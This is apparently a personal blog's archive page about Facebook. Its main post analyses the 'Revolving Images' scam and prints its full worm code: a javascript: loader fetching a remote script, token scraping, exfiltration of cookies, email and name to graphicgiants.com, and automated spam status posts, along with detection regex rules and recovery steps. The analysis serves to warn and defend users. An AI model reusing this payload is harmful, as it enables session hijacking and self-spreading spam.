SmexyyWeby

Scripting for Fun and Passion

Tag Archives: Facebook

How to safeguard against the Facebook Revolving Images Scam


I assume those reading this are already aware of the newest Facebook Revolving Images Scam, which is spreading like wildfire. In my last article about the scam I discussed what was working in the background of this whole Revolving Images thing, including the JavaScript behind it.

If you would like to know more in detail about the Scam please read my last post: Facebook Revolving Images Scam

In this post I will walk you through a solution I found online to safeguard yourself from this scam so that you do not become a victim of it again.

The spam makes wall posts and updates users’ statuses. To do this, it uses a not so newly launched Facebook feature called “Upload Via E-mail”. It is a unique personal email address given to every user, which allows one to post status updates or send photos and videos straight to one’s profile. The spam has recorded this email address of yours and is using it to update your status. Thankfully, Facebook lets you change this email address. This is how you can do it.

Step 1: Go over to http://www.facebook.com/mobile/

Find “More Facebook Mobile Products” written somewhere further down the page. Find “Upload Via Email“. Click “Find out more“.

Facebook Mobile Page


Step 2: Now look at the image below and click exactly where it says “..refresh your upload email.” or exactly where you see the cursor in the image.

Reset Mobile Upload Email


Step 3: Now press reset. Don’t worry, your computer will not crumble to pieces. At least, not yet.

Confirm Email Resetting


Step 4: If you see an image something like this (below) then you are done for the day. The spam won’t work anymore.

Get New Upload Email


Once done you are safe from the scam. But remember:

DO NOT EVER PASTE ANY UNKNOWN JAVASCRIPT CODE INTO YOUR ADDRESS BAR, ESPECIALLY WHILE LOGGED INTO ANY IMPORTANT SERVICE LIKE BANKING, SOCIAL MEDIA, EMAIL, ETC.

Read more about the Revolving Images Scam here at: Facebook Revolving Images Scam

Original Article taken from: here thanks to Mr. Pulkit Kaushik and his Reader Zahid for sharing this valuable piece of information with us.


Javascript of Revolving Images Spam on Facebook


NOTE: All links written in this post are for informational purpose only. I will not be responsible for anything which happens to your Facebook account if you choose to click on any of the links. I would not suggest you to click on them at all unless and until you have completely safeguarded yourself. Please click on any of them at your own risk. All other information posted in this blog post is for informational purpose only. I will not be held responsible if anyone decides to use the code provided in the blog post to make any malicious scripts.

UPDATE1: You can report the link to Facebook by submitting the link and other details at http://www.facebook.com/help/contact.php?show_form=report_phishing

UPDATE2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

Recently on Facebook many people have been tricked into unknowingly spamming a link called

http://bit.ly/91wrzd

http://bit.ly/faceb00ked

http://majicalimages.tk/

What this link claims to do is make all the images on your page pop out and revolve. Behind the scenes, however, it is solely intended to make you spam this link further to many more people by posting this message on your Wall:

Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/

Please DO NOT CLICK on the above links.

Now when you click on the link you will be taken to a page like this:

image

Once you are on this page it will ask you to paste the JavaScript into your address bar on a Facebook page. As you can see, the JavaScript is basically:

javascript:(a = (b = document).createElement(“script”)).src = “//graphicgiants.com/majic.js?show”, b.body.appendChild(a); void(0)

This snippet creates a script element pointing at graphicgiants.com/majic.js?show and appends it to your current page, which makes the browser fetch and run that script in the context of the Facebook page you are on.

So many people are unknowingly spamming this link in their wall posts, which in turn tricks many more people into clicking it.

So I checked it out, and what is happening is that if you try to open the link graphicgiants.com/majic.js?show in the browser, you can never check what JavaScript is running. However, I used the cURL script I wrote earlier in this post to access the link and I got the whole script which is running in the background. The script is given below (I have indented it properly for clear comprehension):


txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";
with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0;
llimit = 20;
t = setInterval(function () {
if (i >= llimit) return;
if (i == 0) {
with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxx.readyState == 4 && xxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxxx.readyState == 4 && xxxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
}
if (i % 2 == 0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
} else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
i += 1;
}, 2000);
}
}, send(null);
}
}, send(null);

I have highlighted the main points in this script. In the first two lines it prepares the two main messages to post. Following that, it makes new XHR requests (Ajax requests) and calls the scripts at majic.js and mmjaicc.js, passing your cookie values to them. Since you are on a Facebook page, your cookie values for the facebook.com domain are also passed to the script. Once it gets the cookie, it calls Facebook's ajax/updatestatus.php with the details of the text it wants to post in your status.

So this is the way you are getting tricked into spreading this spam. The best way to counter this is NOT TO CLICK on any such links.

Also, the script seems to have been made by the owners of this page: http://www.facebook.com/GraphicGiants so please go and report this Page for abuse to stop this spamming. Please leave a comment if you know of any more such links or any solution to this problem. I hope Facebook figures it out soon.
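
The behaviours described above (a script element loaded from another host, document.cookie placed in a request URL, form tokens scraped from the page, and a scripted POST to updatestatus.php) can be checked for statically before anyone runs a snippet. The following JavaScript is an added example, not part of the original post; the rule names, the verdict() grading and the sample inputs (with the placeholder host loader.example.invalid) are assumptions made for illustration.

```javascript
// Added example: static triage for the behaviours this post describes.
// Rule ids and all sample inputs below are constructed for illustration.
const RULES = [
  { id: "javascript-uri",          // snippet meant for the address bar
    re: /^\s*javascript:/i },
  { id: "remote-script-injection", // <script> element pointed at another host
    re: /createElement\(\s*["'“]script["'”]\s*\)[\s\S]*?\bsrc\s*=\s*["'“](?:https?:)?\/\// },
  { id: "cookie-in-url",           // document.cookie concatenated into a script URL
    re: /\bsrc\s*=[^;]*document\.cookie/ },
  { id: "form-token-scrape",       // anti-forgery tokens pulled out of page HTML
    re: /match\([^)]*(?:fb_dtsg|post_form_id)/ },
  { id: "scripted-status-post",    // status update sent by script, not by the user
    re: /open\(\s*["']POST["']\s*,\s*["'][^"']*updatestatus/i },
];

// Return the ids of every rule that matches the script source text.
function triageScript(source) {
  return RULES.filter((rule) => rule.re.test(source)).map((rule) => rule.id);
}

// Collapse rule hits into a verdict a reviewer can act on.
function verdict(source) {
  const hits = triageScript(source);
  const leaksSession = hits.includes("cookie-in-url");
  const postsAsUser = hits.includes("form-token-scrape") &&
                      hits.includes("scripted-status-post");
  if (leaksSession || postsAsUser) return "malicious";
  return hits.length > 0 ? "suspicious" : "no-indicators";
}

// Constructed samples (placeholder host, not the scam's real files).
const SAMPLE_LOADER =
  'javascript:(a = (b = document).createElement("script")).src = ' +
  '"//loader.example.invalid/x.js", b.body.appendChild(a); void(0)';
const SAMPLE_PAYLOAD = [
  'dt = z.match(/name="fb_dtsg" value="([\\d\\w]+)"/i)[1];',
  's = document.createElement("script");',
  's.src = "http://loader.example.invalid/c.js?c=" + document.cookie;',
  'x.open("POST", "/ajax/updatestatus.php?__a=1");',
].join("\n");
const SAMPLE_BENIGN = 'document.title = "hello";';

for (const [name, src] of [["loader", SAMPLE_LOADER],
                           ["payload", SAMPLE_PAYLOAD],
                           ["benign", SAMPLE_BENIGN]]) {
  console.log(name, verdict(src), triageScript(src).join(","));
}
```

A loader that only injects a remote script grades as "suspicious" because its real behaviour lives in the file it fetches; the fetched file is what needs the second pass.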

Happy Facebooking. Stay Safe.


Facebook revamps Messages: Its all about Conversation Now


Email is so much in use these days that it's almost impossible for anyone to live without an email address and have a substantial presence in this world. Every single small thing, from registering for the cookie competition to applying for a mega lottery, from sending job applications to registering on a matrimonial website, requires an email address.

Personally for me I have 3 major Email Accounts and I operate all three of them pretty regularly. One good solution I found was of forwarding all my mails to one account and then having the whole conversation there. Top that up with the great threading feature that Gmail has so tracking conversations is easier. But then a few days back I saw this cool app on the Android phone of my friend which organized your SMSs also in threads. This is something anyone is going to love. Having the whole conversation with a person at one place.

And I think Facebook just nailed that. Today Facebook announced its latest Messaging Service on its Official Blog, which is going to take Facebook Messages to an all new level. What sets this service apart from anything else is that it allows you to have all your conversations in one single place, whether they are via mail, SMS or chat. This is something which anyone who loves getting connected with his/her friends through all sorts of communication channels would love to have. Conversations with one person are also going to be listed under one thread, so it's going to be a really pleasant experience for the user of this service, as is very beautifully said in the blog post itself:

They will have the conversational history with the people in their lives all the way back to the beginning: From “hey nice to meet you” to “do you want to get coffee sometime” to “our kids have soccer practice at 6 pm tonight.” That’s a really cool idea.

Not only this. The message service will only allow your friends to send you messages and everything else will go in an Others folder. You can also select who you want to receive emails from. It's something I believe is very good for personal messaging. I personally would prefer to have a personal space in my mailbox where I can only receive emails from my close friends and family members. I believe Facebook is going to give me just that solution.

All your messages together


Full conversation history


The messages you want


Now top that up with something which any Facebook user would love to have: a @facebook.com email ID. This is something I personally am very excited about, as being a Facebook user it will be great to show off your facebook.com email ID and feel proud about it =).

Overall I am loving the service as described in its announcement and am very eager to use it at the earliest. If you are also interested you can ask for an invite at http://www.facebook.com/about/messages/

Let's see what they make out of it. Personally, for me it will be a great service because I am usually present on Facebook 24*7 and it's a second home to me. Just waiting for the release and getting my @facebook.com ID.

Also check the screenshots of the new Message Service available on Mashable at http://mashable.com/2010/11/15/facebook-messages-video/#5449Facebook-Messages-Splash-Screen

Say NO to facebook quiz Updates


Heyy Guys.. Fbuking right .. Well I know we all love fbuk like anything and some of us can’t even live without it. But the thing is that there is something that is irritating us these days on Fbuk.. and that is those silly quizzes that we get to see. Sometimes these quizzes are soo idiotic that they can find your future by asking you silly questions like what is the color of your eyes.. Bullshit.

Not only do these quizzes take a lot of your time but sometimes they make you a complete idiot… aah …. and for people like me who can’t resist trying out new apps …. I think this is a boon as I will be saved from all these crap quiz updates.

The cool thing about this script is that it lets you toggle between the hidden and the shown status of the updates so occasionally you can check which of the quizzes are worth taking.

So I was searching for some means to get rid of this crap and here I came across a cool Greasemonkey script.

In order to run the script all you have to do is install the Greasemonkey Firefox Addon and then install this script from here.

So all you have to do is install this script and get rid of all those irritating quiz updates.